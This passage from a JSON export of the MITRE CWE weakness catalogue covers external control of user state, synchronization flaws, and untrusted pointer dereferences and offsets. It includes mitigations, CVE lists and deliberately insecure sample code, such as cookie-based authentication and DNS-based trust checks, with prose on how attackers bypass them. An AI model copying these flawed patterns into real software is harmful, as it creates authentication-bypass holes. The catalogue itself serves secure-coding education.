Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-14"},"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store state information and sensitive data on the server side only.","Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions.","If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that you has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328)."]}},{"attr":{"@_Mitigation_ID":"MIT-4.2"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","With a stateless protocol such as HTTP, use a framework that maintains the state for you.","Examples include ASP.NET View State [REF-756] and the OWASP ESAPI Session Management feature [REF-45].","Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Identify all inputs that are used for security decisions and determine if you can modify the design so that you do not have to rely on submitted inputs at all. For example, you may be able to keep critical information about the user\'s session on the server side instead of recording it within external data."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-15"},"Intro_Text":"The following code excerpt reads a value from a browser cookie to determine the role of the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"role\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"userRole = c.getValue();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-16"},"Intro_Text":"The following code could be for a medical records application. It performs authentication by checking if a cookie has been set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$auth = $_COOKIES[\'authenticated\'];if (! $auth) {}DisplayMedicalHistory($_POST[\'patient_ID\']);","xhtml:br":["",""],"xhtml:div":{"#text":"if (AuthenticateUser($_POST[\'user\'], $_POST[\'password\']) == \\"success\\") {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"// save the cookie to send out in future responsessetcookie(\\"authenticated\\", \\"1\\", time()+60*60*2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"ShowLoginScreen();die(\\"\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},"Body_Text":["The programmer expects that the AuthenticateUser() check will always be applied, and the \\"authenticated\\" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie.","However, the attacker can set the \\"authenticated\\" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication."]},{"attr":{"@_Demonstrative_Example_ID":"DX-17"},"Intro_Text":"In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"authenticated\\") &amp;&amp; Boolean.TRUE.equals(c.getValue())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-93"},"Intro_Text":"The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct hostent *hp;struct in_addr myaddr;char* tHost = \\"trustme.example.com\\";myaddr.s_addr=inet_addr(ip_addr_string);hp = gethostbyaddr((char *) &amp;myaddr, sizeof(struct in_addr), AF_INET);if (hp &amp;&amp; !strncmp(hp-&gt;h_name, tHost, sizeof(tHost))) {} else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"trusted = false;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1549","Description":"Attacker can bypass authentication by setting a cookie to a specific value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1549"},{"Reference":"CVE-2009-1619","Description":"Attacker can bypass authentication and gain admin privileges by setting an \\"admin\\" cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1619"},{"Reference":"CVE-2009-0864","Description":"Content management system allows admin privileges by setting a \\"login\\" cookie to \\"OK.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0864"},{"Reference":"CVE-2008-5784","Description":"e-dating application allows admin privileges by setting the admin cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5784"},{"Reference":"CVE-2008-6291","Description":"Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6291"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC09-J","Entry_Name":"Do not base security checks on untrusted sources"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-754"}},{"attr":{"@_External_Reference_ID":"REF-529"}},{"attr":{"@_External_Reference_ID":"REF-756"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-18"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"820":{"attr":{"@_ID":"820","@_Name":"Missing Synchronization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software utilizes a shared resource in a concurrent manner but does not attempt to synchronize access to the resource.","Extended_Description":"If access to a shared resource is not synchronized, then the resource may not be in a state that is expected by the software. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code intends to fork a process, then have both the parent and child processes print a single line.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"static void print (char * string) {}int main(void) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char * word;int counter;for (word = string; counter = *word++; ) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"putc(counter, stdout);fflush(stdout);sleep(1);","xhtml:br":["","","",""],"xhtml:i":"/* Make timing window a little larger... */"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pid_t pid;pid = fork();if (pid == -1) {}else if (pid == 0) {}else {}exit(0);","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"exit(-2);","attr":{"@_style":"margin-left:10px;"}},{"#text":"print(\\"child\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"print(\\"PARENT\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}}],"xhtml:br":["",""]}},"Body_Text":["One might expect the code to print out something like:",{"xhtml:div":{"xhtml:div":["PARENT","child"]}},"However, because the parent and child are executing concurrently, and stdout is flushed each time a character is printed, the output might be mixed together, such as:",{"xhtml:div":{"xhtml:div":["PcAhRiElNdT","[blank line]","[blank line]"]}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK05-J","Entry_Name":"Synchronize access to static fields that can be modified by untrusted code"}},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc.  CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-08-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"821":{"attr":{"@_ID":"821","@_Name":"Incorrect Synchronization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software utilizes a shared resource in a concurrent manner, but it does not correctly synchronize access to the resource.","Extended_Description":"If access to a shared resource is not correctly synchronized, then the resource may not be in a state that is expected by the software. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc.  CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-08-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"822":{"attr":{"@_ID":"822","@_Name":"Untrusted Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program obtains a value from an untrusted source, converts this value to a pointer, and dereferences the resulting pointer.","Extended_Description":{"xhtml:p":["An attacker can supply a pointer for memory locations that the program is not expecting. If the pointer is dereferenced for a write operation, the attack might allow modification of critical program state variables, cause a crash, or execute code. If the dereferencing operation is for a read, then the attack might allow reading of sensitive data, cause a crash, or set a program variable to an unexpected value (since the value will be read from an unexpected memory location).","There are several variants of this weakness, including but not necessarily limited to:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The untrusted value is directly invoked as a function call.","In OS kernels or drivers where there is a boundary between \\"userland\\" and privileged memory spaces, an untrusted pointer might enter through an API or system call (see CWE-781 for one such example).","Inadvertently accepting the value from an untrusted control sphere when it did not have to be accepted as input at all. This might occur when the code was originally developed to be run by a single user in a non-networked environment, and the code is then ported to or otherwise exposed to a networked environment."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the untrusted pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" or larger than expected by a read or write operation, the application may terminate unexpectedly."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5655","Description":"message-passing framework interprets values in packets as pointers, causing a crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5655"},{"Reference":"CVE-2010-2299","Description":"labeled as a \\"type confusion\\" issue, also referred to as a \\"stale pointer.\\" However, the bug ID says \\"contents are simply interpreted as a pointer... renderer ordinarily doesn\'t supply this pointer directly\\". The \\"handle\\" in the untrusted area is replaced in one function, but not another - thus also, effectively, exposure to wrong sphere (CWE-668).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2299"},{"Reference":"CVE-2009-1719","Description":"Untrusted dereference using undocumented constructor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1719"},{"Reference":"CVE-2009-1250","Description":"An error code is incorrectly checked and interpreted as a pointer, leading to a crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1250"},{"Reference":"CVE-2009-0311","Description":"An untrusted value is obtained from a packet and directly called as a function pointer, leading to code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0311"},{"Reference":"CVE-2010-1818","Description":"Undocumented attribute in multimedia software allows \\"unmarshaling\\" of an untrusted pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1818"},{"Reference":"CVE-2010-3189","Description":"ActiveX control for security software accepts a parameter that is assumed to be an initialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3189"},{"Reference":"CVE-2010-1253","Description":"Spreadsheet software treats certain record values that lead to \\"user-controlled pointer\\" (might be untrusted offset, not untrusted pointer).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1253"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"129"}}},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"823":{"attr":{"@_ID":"823","@_Name":"Use of Out-of-range Pointer Offset","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.","Extended_Description":{"xhtml:p":["While a pointer can contain a reference to any arbitrary memory location, a program typically only intends to use the pointer to access limited portions of memory, such as contiguous memory used to access an individual array.","Programs may use offsets in order to access fields or sub-elements stored within structured data. The offset might be out-of-range if it comes from an untrusted source, is the result of an incorrect calculation, or occurs because of another error.","If an attacker can control or influence the offset so that it points outside of the intended boundaries of the structure, then the attacker may be able to read or write to memory locations that are used elsewhere in the program. As a result, the attack might change the state of the software as accessed through program variables, cause a crash or instable behavior, and possibly lead to code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Untrusted pointer offset","Description":"This term is narrower than the concept of \\"out-of-range\\" offset, since the offset might be the result of a calculation or other error that does not depend on any externally-supplied values."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the untrusted pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" or larger than expected by a read or write operation, the application may terminate unexpectedly."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-2160","Description":"Invalid offset in undocumented opcode leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2160"},{"Reference":"CVE-2010-1281","Description":"Multimedia player uses untrusted value from a file when using file-pointer calculations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1281"},{"Reference":"CVE-2009-3129","Description":"Spreadsheet program processes a record with an invalid size field, which is later used as an offset.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3129"},{"Reference":"CVE-2009-2694","Description":"Instant messaging library does not validate an offset value specified in a packet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694"},{"Reference":"CVE-2009-2687","Description":"Language interpreter does not properly handle invalid offsets in JPEG image, leading to out-of-bounds memory access and crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2687"},{"Reference":"CVE-2009-0690","Description":"negative offset leads to out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0690"},{"Reference":"CVE-2008-4114","Description":"untrusted offset in kernel","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114"},{"Reference":"CVE-2010-2873","Description":"\\"blind trust\\" of an offset value while writing heap memory allows corruption of function pointer,leading to code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2873"},{"Reference":"CVE-2010-2866","Description":"negative value (signed) causes pointer miscalculation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2866"},{"Reference":"CVE-2010-2872","Description":"signed values cause incorrect pointer calculation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2872"},{"Reference":"CVE-2007-5657","Description":"values used as pointer offsets","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5657"},{"Reference":"CVE-2010-2867","Description":"a return value from a function is sign-extended if the value is signed, then used as an offset for pointer arithmetic","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2867"},{"Reference":"CVE-2009-1097","Description":"portions of a GIF image used as offsets, causing corruption of an object pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097"},{"Reference":"CVE-2008-1807","Description":"invalid numeric field leads to a free of arbitrary memory locations, then code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1807"},{"Reference":"CVE-2007-2500","Description":"large number of elements leads to a free of an arbitrary address","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2500"},{"Reference":"CVE-2008-1686","Description":"array index issue (CWE-129) with negative offset, used to dereference a function pointer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1686"},{"Reference":"CVE-2010-2878","Description":"\\"buffer seek\\" value - basically an offset?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2878"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"129"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Pointer Arithmetic&#34;, Page 277"}}},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as 